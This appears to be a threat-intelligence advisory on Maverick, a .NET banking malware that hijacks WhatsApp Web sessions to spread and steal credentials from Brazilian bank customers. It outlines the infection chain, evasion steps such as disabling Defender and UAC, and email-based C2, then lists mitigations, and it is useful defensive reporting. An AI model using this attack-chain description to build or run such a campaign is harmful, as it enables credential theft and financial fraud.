Maverick Malware - WhatsApp Web Hijack Targets Brazil’s Banks

Maverick, a .NET banking malware linked to the Water Saci cluster, hijacks WhatsApp Web sessions to self-propagate and steal banking credentials from Brazilian users, mapped to T1105 (Ingress Tool Transfer), T1059 (Command & Scripting), and T1114 (Email Collection via IMAP C2). The attack chain drops a ZIP containing a Windows LNK that launches PowerShell, downloads a loader, and deploys two components: SORVEPOTEL for propagation and Maverick for credential theft and browser monitoring. Targets include Brazil’s largest banks and hospitality sector. Propagation abuses Chrome profiles and Selenium/ChromeDriver to automate WhatsApp Web, exfiltrate contact lists, and message templates. The malware checks locale/time-zone to ensure Brazilian targeting, disables Microsoft Defender and UAC, and only delivers Maverick after environmental checks. Analysts note overlaps with the Coyote family, though treatment as a distinct threat continues. Impact: With 148M+ WhatsApp users in Brazil, organizations face account takeover, large-scale credential theft, financial fraud, and reputational damage. Maverick’s C2 employs email-based control (terra.com[.]br via IMAP with MFA) alongside HTTP endpoints, allowing human-in-the-loop orchestration to pause/resume campaigns and tailor lures. Mitigation: enforce application control and PowerShell Constrained Language Mode, monitor for ChromeDriver/Selenium downloads, block suspicious LNK execution from archives, and detect WhatsApp Web automation patterns. Educate users on ZIP/LNK risks and monitor banking URL matches in active tab telemetry.